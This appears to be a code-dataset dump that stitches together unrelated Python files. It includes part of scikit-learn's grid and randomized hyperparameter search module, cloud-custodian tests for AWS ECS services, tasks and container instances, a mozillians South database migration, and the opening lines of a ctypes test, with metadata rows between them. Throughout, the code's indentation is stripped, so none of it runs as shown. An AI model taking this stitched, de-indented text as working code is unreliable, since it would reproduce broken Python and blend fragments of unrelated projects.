>>> clf.fit(iris.data, iris.target)
... # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
GridSearchCV(cv=None, error_score=...,
estimator=SVC(C=1.0, cache_size=..., class_weight=..., coef0=...,
decision_function_shape=None, degree=..., gamma=...,
kernel='rbf', max_iter=-1, probability=False,
random_state=None, shrinking=True, tol=...,
verbose=False),
fit_params={}, iid=..., n_jobs=1,
param_grid=..., pre_dispatch=..., refit=...,
scoring=..., verbose=...)
Attributes
----------
grid_scores_ : list of named tuples
Contains scores for all parameter combinations in param_grid.
Each entry corresponds to one parameter setting.
Each named tuple has the attributes:
* ``parameters``, a dict of parameter settings
* ``mean_validation_score``, the mean score over the
cross-validation folds
* ``cv_validation_scores``, the list of scores for each fold
best_estimator_ : estimator
Estimator that was chosen by the search, i.e. estimator
which gave highest score (or smallest loss if specified)
on the left out data. Not available if refit=False.
best_score_ : float
Score of best_estimator on the left out data.
best_params_ : dict
Parameter setting that gave the best results on the hold out data.
scorer_ : function
Scorer function used on the held out data to choose the best
parameters for the model.
Notes
------
The parameters selected are those that maximize the score of the left out
data, unless an explicit score is passed in which case it is used instead.
If `n_jobs` was set to a value higher than one, the data is copied for each
point in the grid (and not `n_jobs` times). This is done for efficiency
reasons if individual jobs take very little time, but may raise errors if
the dataset is large and not enough memory is available. A workaround in
this case is to set `pre_dispatch`. Then, the memory is copied only
`pre_dispatch` many times. A reasonable value for `pre_dispatch` is `2 *
n_jobs`.
See Also
---------
:class:`ParameterGrid`:
generates all the combinations of a hyperparameter grid.
:func:`sklearn.cross_validation.train_test_split`:
utility function to split the data into a development set usable
for fitting a GridSearchCV instance and an evaluation set for
its final evaluation.
:func:`sklearn.metrics.make_scorer`:
Make a scorer from a performance metric or loss function.
"""
def __init__(self, estimator, param_grid, scoring=None, fit_params=None,
n_jobs=1, iid=True, refit=True, cv=None, verbose=0,
pre_dispatch='2*n_jobs', error_score='raise'):
super(GridSearchCV, self).__init__(
estimator, scoring, fit_params, n_jobs, iid,
refit, cv, verbose, pre_dispatch, error_score)
self.param_grid = param_grid
_check_param_grid(param_grid)
def fit(self, X, y=None):
"""Run fit with all sets of parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
"""
return self._fit(X, y, ParameterGrid(self.param_grid))
class RandomizedSearchCV(BaseSearchCV):
"""Randomized search on hyper parameters.
RandomizedSearchCV implements a "fit" and a "score" method.
It also implements "predict", "predict_proba", "decision_function",
"transform" and "inverse_transform" if they are implemented in the
estimator used.
The parameters of the estimator used to apply these methods are optimized
by cross-validated search over parameter settings.
In contrast to GridSearchCV, not all parameter values are tried out, but
rather a fixed number of parameter settings is sampled from the specified
distributions. The number of parameter settings that are tried is
given by n_iter.
If all parameters are presented as a list,
sampling without replacement is performed. If at least one parameter
is given as a distribution, sampling with replacement is used.
It is highly recommended to use continuous distributions for continuous
parameters.
Read more in the :ref:`User Guide <randomized_parameter_search>`.
Parameters
----------
estimator : estimator object.
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
param_distributions : dict
Dictionary with parameters names (string) as keys and distributions
or lists of parameters to try. Distributions must provide a ``rvs``
method for sampling (such as those from scipy.stats.distributions).
If a list is given, it is sampled uniformly.
n_iter : int, default=10
Number of parameter settings that are sampled. n_iter trades
off runtime vs quality of the solution.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
If ``None``, the ``score`` method of the estimator is used.
fit_params : dict, optional
Parameters to pass to the fit method.
n_jobs : int, default=1
Number of jobs to run in parallel.
pre_dispatch : int, or string, optional
Controls the number of jobs that get dispatched during parallel
execution. Reducing this number can be useful to avoid an
explosion of memory consumption when more jobs get dispatched
than CPUs can process. This parameter can be:
- None, in which case all the jobs are immediately
created and spawned. Use this for lightweight and
fast-running jobs, to avoid delays due to on-demand
spawning of the jobs
- An int, giving the exact number of total jobs that are
spawned
- A string, giving an expression as a function of n_jobs,
as in '2*n_jobs'
iid : boolean, default=True
If True, the data is assumed to be identically distributed across
the folds, and the loss minimized is the total loss per sample,
and not the mean loss across the folds.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
refit : boolean, default=True
Refit the best estimator with the entire dataset.
If "False", it is impossible to make predictions using
this RandomizedSearchCV instance after fitting.
verbose : integer
Controls the verbosity: the higher, the more messages.
random_state : int or RandomState
Pseudo random number generator state used for random uniform sampling
from lists of possible values instead of scipy.stats distributions.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Attributes
----------
grid_scores_ : list of named tuples
Contains scores for all parameter combinations in param_grid.
Each entry corresponds to one parameter setting.
Each named tuple has the attributes:
* ``parameters``, a dict of parameter settings
* ``mean_validation_score``, the mean score over the
cross-validation folds
* ``cv_validation_scores``, the list of scores for each fold
best_estimator_ : estimator
Estimator that was chosen by the search, i.e. estimator
which gave highest score (or smallest loss if specified)
on the left out data. Not available if refit=False.
best_score_ : float
Score of best_estimator on the left out data.
best_params_ : dict
Parameter setting that gave the best results on the hold out data.
Notes
-----
The parameters selected are those that maximize the score of the held-out
data, according to the scoring parameter.
If `n_jobs` was set to a value higher than one, the data is copied for each
parameter setting(and not `n_jobs` times). This is done for efficiency
reasons if individual jobs take very little time, but may raise errors if
the dataset is large and not enough memory is available. A workaround in
this case is to set `pre_dispatch`. Then, the memory is copied only
`pre_dispatch` many times. A reasonable value for `pre_dispatch` is `2 *
n_jobs`.
See Also
--------
:class:`GridSearchCV`:
Does exhaustive search over a grid of parameters.
:class:`ParameterSampler`:
A generator over parameter settings, constructed from
param_distributions.
"""
def __init__(self, estimator, param_distributions, n_iter=10, scoring=None,
fit_params=None, n_jobs=1, iid=True, refit=True, cv=None,
verbose=0, pre_dispatch='2*n_jobs', random_state=None,
error_score='raise'):
self.param_distributions = param_distributions
self.n_iter = n_iter
self.random_state = random_state
super(RandomizedSearchCV, self).__init__(
estimator=estimator, scoring=scoring, fit_params=fit_params,
n_jobs=n_jobs, iid=iid, refit=refit, cv=cv, verbose=verbose,
pre_dispatch=pre_dispatch, error_score=error_score)
def fit(self, X, y=None):
"""Run fit on the estimator with randomly drawn parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
"""
sampled_params = ParameterSampler(self.param_distributions,
self.n_iter,
random_state=self.random_state)
return self._fit(X, y, sampled_params)
| bsd-3-clause | -4,600,771,839,748,933,000 | 37.342289 | 87 | 0.608943 | false |
alfredgamulo/cloud-custodian | tests/test_ecs.py | 1 | 18797 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from .common import BaseTest
import fnmatch
import os
import time
from c7n.exceptions import PolicyExecutionError
class TestEcsService(BaseTest):
def test_ecs_cluster_tag_augment(self):
session_factory = self.replay_flight_data(
'test_ecs_cluster_tag_augment')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs',
'filters': [{'tag:Data': 'Magic'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]['Tags'],
[{'Key': 'Env', 'Value': 'Dev'},
{'Key': 'Data', 'Value': 'Magic'}])
def test_ecs_service_config(self):
session_factory = self.replay_flight_data(
'test_ecs_service_config')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs-service', 'source': 'config'},
session_factory=session_factory)
resources = p.run()
assert len(resources) == 1
assert resources[0]['name'] == 'queue-processor'
assert resources[0]['clusterArn'].endswith('cluster/dev')
def test_ecs_service_tag_augment(self):
session_factory = self.replay_flight_data(
'test_ecs_service_tag_augment')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs-service'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]['Tags'],
[{'Key': 'Name', 'Value': 'Dev'}])
def test_ecs_service_by_arn(self):
session_factory = self.replay_flight_data('test_ecs_service_by_arn')
p = self.load_policy({
'name': 'ecs-svc', 'resource': 'ecs-service'},
session_factory=session_factory)
svcs = p.resource_manager.get_resources(
["arn:aws:ecs:us-east-1:644160558196:service/test/test-no-delete"])
self.assertEqual(len(svcs), 1)
self.assertEqual(
{t['Key']: t['Value'] for t in svcs[0]['Tags']},
{'Env': 'Dev', 'Owner': '1'})
self.assertRaises(
PolicyExecutionError,
p.resource_manager.get_resources,
["arn:aws:ecs:us-east-1:644160558196:service/test-no-delete"])
def test_ecs_service_resource(self):
session_factory = self.replay_flight_data("test_ecs_service")
p = self.load_policy(
{"name": "all-ecs", "resource": "ecs-service"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "home-web")
def test_ecs_service_metrics(self):
session_factory = self.replay_flight_data("test_ecs_service_metrics")
p = self.load_policy(
{
"name": "all-ecs",
"resource": "ecs-service",
"filters": [
{"serviceName": "home-web"},
{
"type": "metrics",
"name": "MemoryUtilization",
"op": "less-than",
"value": 1,
},
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertTrue("c7n.metrics" in resources[0])
def test_ecs_service_update(self):
session_factory = self.replay_flight_data("test_ecs_service_update")
test_service_name = 'custodian-service-update-test'
p = self.load_policy(
{
"name": "all-ecs-to-update",
"resource": "ecs-service",
"filters": [
{"networkConfiguration.awsvpcConfiguration.assignPublicIp": "ENABLED"},
{"serviceName": test_service_name}
],
"actions": [
{
'type': 'modify',
'update': {
'networkConfiguration': {
'awsvpcConfiguration': {
'assignPublicIp': 'DISABLED',
}
},
}
}
],
},
session_factory=session_factory,
)
result = p.run()
self.assertEqual(len(result), 1)
client = session_factory().client("ecs")
svc_current = client.describe_services(
cluster="arn:aws:ecs:us-east-1:644160558196:cluster/test-cluster",
services=[test_service_name]
)["services"][0]
self.assertEqual(svc_current['networkConfiguration'][
'awsvpcConfiguration']['assignPublicIp'], 'DISABLED')
def test_ecs_service_delete(self):
session_factory = self.replay_flight_data("test_ecs_service_delete")
p = self.load_policy(
{
"name": "all-ecs",
"resource": "ecs-service",
"filters": [{"serviceName": "web"}],
"actions": ["delete"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
svc = resources.pop()
self.assertEqual(svc["serviceName"], "web")
if self.recording:
time.sleep(1)
client = session_factory().client("ecs")
svc_current = client.describe_services(
cluster=svc["clusterArn"], services=[svc["serviceName"]]
)[
"services"
][
0
]
self.assertEqual(svc_current["serviceArn"], svc["serviceArn"])
self.assertNotEqual(svc_current["status"], svc["status"])
def test_ecs_service_task_def_filter(self):
session_factory = self.replay_flight_data("test_ecs_task_def_filter")
p = self.load_policy(
{
"name": "services-using-nginx",
"resource": "ecs-service",
"filters": [
{
"type": "task-definition",
"key": "containerDefinitions[].image",
"op": "in",
"value_type": "swap",
"value": "nginx:latest",
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "home-web")
def test_ecs_service_taggable(self):
services = [
{"serviceArn": "arn:aws:ecs:us-east-1:644160558196:service/test/test-yes-tag",
"serviceName": "test-yes-tag",
"clusterArn": "arn:aws:ecs:us-east-1:644160558196:cluster/test"},
{"serviceArn": "arn:aws:ecs:us-east-1:644160558196:service/test-no-tag",
"serviceName": "test-no-tag",
"clusterArn": "arn:aws:ecs:us-east-1:644160558196:cluster/test"}]
p = self.load_policy({
"name": "ecs-service-taggable",
"resource": "ecs-service",
"filters": [
{"type": "taggable", "state": True}]})
resources = p.resource_manager.filter_resources(services)
self.assertEqual(len(resources), 1)
self.assertTrue(resources[0]['serviceName'], 'test-yes-tag')
def test_ecs_service_subnet(self):
session_factory = self.replay_flight_data("test_ecs_service_subnet")
p = self.load_policy(
{
"name": "ecs-service-subnets",
"resource": "ecs-service",
"filters": [
{
"type": "subnet",
"key": "tag:Name",
"value": "implied"
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "c7n-test")
class TestEcsTaskDefinition(BaseTest):
def test_task_definition_resource(self):
session_factory = self.replay_flight_data("test_ecs_task_def")
p = self.load_policy(
{"name": "task-defs", "resource": "ecs-task-definition"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 3)
images = set()
for r in resources:
for c in r["containerDefinitions"]:
images.add(c["image"])
self.assertEqual(
sorted(images), ["nginx:latest", "postgres:latest", "redis:latest"]
)
def test_task_definition_delete(self):
session_factory = self.replay_flight_data("test_ecs_task_def_delete")
p = self.load_policy(
{
"name": "task-defs",
"resource": "ecs-task-definition",
"filters": [{"family": "launch-me"}],
"actions": ["delete"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]["containerDefinitions"][0]["image"], "postgres:latest"
)
self.assertEqual(resources[0]["status"], "ACTIVE")
arns = session_factory().client("ecs").list_task_definitions(
familyPrefix="launch-me", status="ACTIVE"
).get(
"taskDefinitionArns"
)
self.assertEqual(arns, [])
def test_task_definition_get_resources(self):
session_factory = self.replay_flight_data("test_ecs_task_def_query")
p = self.load_policy(
{"name": "task-defs", "resource": "ecs-task-definition"},
session_factory=session_factory,
)
arn = "arn:aws:ecs:us-east-1:644160558196:task-definition/ecs-read-only-root:1"
resources = p.resource_manager.get_source('describe').get_resources([arn])
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["taskDefinitionArn"], arn)
self.assertEqual(
len(
fnmatch.filter(
os.listdir(
os.path.join(self.placebo_dir, "test_ecs_task_def_query")
),
"*.json",
)
),
1,
)
def test_ecs_task_def_tags(self):
session_factory = self.replay_flight_data(
"test_ecs_task_def_tags"
)
arn = "arn:aws:ecs:us-east-1:644160558196:task-definition/c7n:1"
p = self.load_policy(
{
"name": "tag-ecs-task-def",
"resource": "ecs-task-definition",
"filters": [
{"taskDefinitionArn": arn},
{"tag:Role": "present"}
],
"actions": [
{"type": "tag", "key": "TestKey", "value": "TestValue"},
{"type": "tag", "key": "c7n-tag", "value": "present"},
{"type": "remove-tag", "tags": ["Role"]}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("ecs")
tags = {t['key']: t['value'] for t in
client.list_tags_for_resource(
resourceArn=resources[0]["taskDefinitionArn"]).get("tags")}
self.assertEqual(tags, {"TestKey": "TestValue", "c7n-tag": "present"})
def test_ecs_task_def_config(self):
session_factory = self.replay_flight_data("test_ecs_task_def_config")
p = self.load_policy(
{
"name": "ecs-task-def-config-tag",
"resource": "ecs-task-definition",
"source": "config",
"filters": [
{"tag:test": "name"}
],
"actions": [
{"type": "remove-tag", "tags": ["test"]}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
assert resources[0]['containerDefinitions'] == [
{'command': ['/bin/sh -c "echo \'<html> <head> '
'<title>Amazon ECS Sample App</title> '
'<style>body {margin-top: 40px; '
'background-color: #333;} </style> '
'</head><body> <div '
'style=color:white;text-align:center> '
'<h1>Amazon ECS Sample App</h1> '
'<h2>Congratulations!</h2> <p>Your '
'application is now running on a '
'container in Amazon ECS.</p> '
"</div></body></html>' > "
'/usr/local/apache2/htdocs/index.html '
'&& httpd-foreground"'],
'cpu': 0,
'entryPoint': ['sh', '-c'],
'essential': True,
'image': 'httpd:2.4',
'mountPoints': [],
'name': 'fargate-app-2',
'portMappings': [{'containerPort': 80,
'hostPort': 80,
'protocol': 'tcp'}],
'volumesFrom': []}]
assert resources[0]['Tags'] == [{'Key': 'test', 'Value': 'name'}]
client = session_factory().client("ecs")
self.assertEqual(len(client.list_tags_for_resource(
resourceArn=resources[0]["taskDefinitionArn"]).get("tags")), 0)
class TestEcsTask(BaseTest):
def test_task_by_arn(self):
session_factory = self.replay_flight_data('test_ecs_task_by_arn')
p = self.load_policy({
'name': 'tasks', 'resource': 'ecs-task'}, session_factory=session_factory)
tasks = p.resource_manager.get_resources([
'arn:aws:ecs:us-east-1:644160558196:task/devx/21b23041dec947b996fcc7a8aa606d64'])
self.assertEqual(len(tasks), 1)
self.assertEqual(tasks[0]['launchType'], 'FARGATE')
self.assertEqual(tasks[0]['lastStatus'], 'STOPPED')
self.assertRaises(
PolicyExecutionError,
p.resource_manager.get_resources,
['arn:aws:ecs:us-east-1:644160558196:task/21b23041dec947b996fcc7a8aa606d64'])
def test_task_resource(self):
session_factory = self.replay_flight_data("test_ecs_task")
p = self.load_policy(
{"name": "tasks", "resource": "ecs-task"}, session_factory=session_factory
)
resources = p.run()
self.assertEqual(len(resources), 4)
def test_ecs_task_subnet(self):
session_factory = self.replay_flight_data("test_ecs_task_subnet")
p = self.load_policy(
{
"name": "ecs-task-fargate-subnets",
"resource": "ecs-task",
"filters": [
{
"type": "subnet",
"key": "tag:Name",
"value": "implied"
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0].get('attachments')[0].get(
'details')[0].get('value'), "subnet-05b58b4afe5124322")
def test_task_delete(self):
session_factory = self.replay_flight_data("test_ecs_task_delete")
p = self.load_policy(
{
"name": "tasks",
"resource": "ecs-task",
"filters": [{"group": "service:home-web"}, {"startedBy": "present"}],
"actions": ["stop"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 2)
client = session_factory().client("ecs")
tasks = client.list_tasks(cluster=resources[0]["clusterArn"])["taskArns"]
self.assertFalse({r["taskArn"] for r in resources}.intersection(tasks))
class TestEcsContainerInstance(BaseTest):
def test_container_instance_resource(self):
session_factory = self.replay_flight_data("test_ecs_container_instance")
p = self.load_policy(
{"name": "container-instances", "resource": "ecs-container-instance"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_container_instance_update_agent(self):
session_factory = self.replay_flight_data(
"test_ecs_container_instance_update_agent"
)
p = self.load_policy(
{
"name": "container-instance-update-agent",
"resource": "ecs-container-instance",
"actions": [{"type": "update-agent"}],
},
session_factory=session_factory,
)
resources = p.run()
if self.recording:
time.sleep(60)
client = session_factory().client("ecs")
updated_version = client.describe_container_instances(
cluster="default",
containerInstances=["a8a469ef-009f-40f8-9639-3a0d9c6a9b9e"],
)[
"containerInstances"
][
0
][
"versionInfo"
][
"agentVersion"
]
self.assertNotEqual(
updated_version, resources[0]["versionInfo"]["agentVersion"]
)
def test_container_instance_set_state(self):
session_factory = self.replay_flight_data(
"test_ecs_container_instance_set_state"
)
p = self.load_policy(
{
"name": "container-instance-update-agent",
"resource": "ecs-container-instance",
"actions": [{"type": "set-state", "state": "DRAINING"}],
},
session_factory=session_factory,
)
resources = p.run()
client = session_factory().client("ecs")
state = client.describe_container_instances(
cluster="default", containerInstances=[resources[0]["containerInstanceArn"]]
)[
"containerInstances"
][
0
][
"status"
]
self.assertEqual(state, "DRAINING")
| apache-2.0 | -6,050,890,175,432,686,000 | 36.669339 | 93 | 0.503644 | false |
justinpotts/mozillians | mozillians/users/migrations/0048_auto__add_unique_externalaccount_identifier_type_user.py | 3 | 12132 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'ExternalAccount', fields ['identifier', 'type', 'user']
db.create_unique('users_externalaccount', ['identifier', 'type', 'user_id'])
def backwards(self, orm):
# Removing unique constraint on 'ExternalAccount', fields ['identifier', 'type', 'user']
db.delete_unique('users_externalaccount', ['identifier', 'type', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'groups.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_channel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '63', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'steward': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'system': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'wiki': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'})
},
'groups.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'})
},
'groups.skill': {
'Meta': {'ordering': "['name']", 'object_name': 'Skill'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'})
},
'users.externalaccount': {
'Meta': {'ordering': "['type']", 'unique_together': "(('identifier', 'type', 'user'),)", 'object_name': 'ExternalAccount'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'privacy': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']"})
},
'users.usernameblacklist': {
'Meta': {'ordering': "['value']", 'object_name': 'UsernameBlacklist'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_regex': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'users.userprofile': {
'Meta': {'ordering': "['full_name']", 'object_name': 'UserProfile', 'db_table': "'profile'"},
'allows_community_sites': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'allows_mozilla_sites': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'basket_token': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50'}),
'date_mozillian': ('django.db.models.fields.DateField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'date_vouched': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ircname': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '63', 'blank': 'True'}),
'is_vouched': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Language']"}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'privacy_bio': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_city': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_country': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_date_mozillian': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_email': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_full_name': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_groups': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_ircname': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_languages': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_photo': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_region': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_skills': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_timezone': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_title': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_tshirt': ('mozillians.users.models.PrivacyField', [], {'default': '1'}),
'privacy_vouched_by': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'region': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'skills': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Skill']"}),
'timezone': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '70', 'blank': 'True'}),
'tshirt': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'vouched_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'vouchees'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['users.UserProfile']", 'blank': 'True', 'null': 'True'})
}
}
complete_apps = ['users'] | bsd-3-clause | 6,401,244,330,422,055,000 | 82.675862 | 226 | 0.552258 | false |
Suwmlee/XX-Net | Python3/lib/ctypes/test/test_funcptr.py | 3 | 4038 | import os, unittest
from ctypes import *
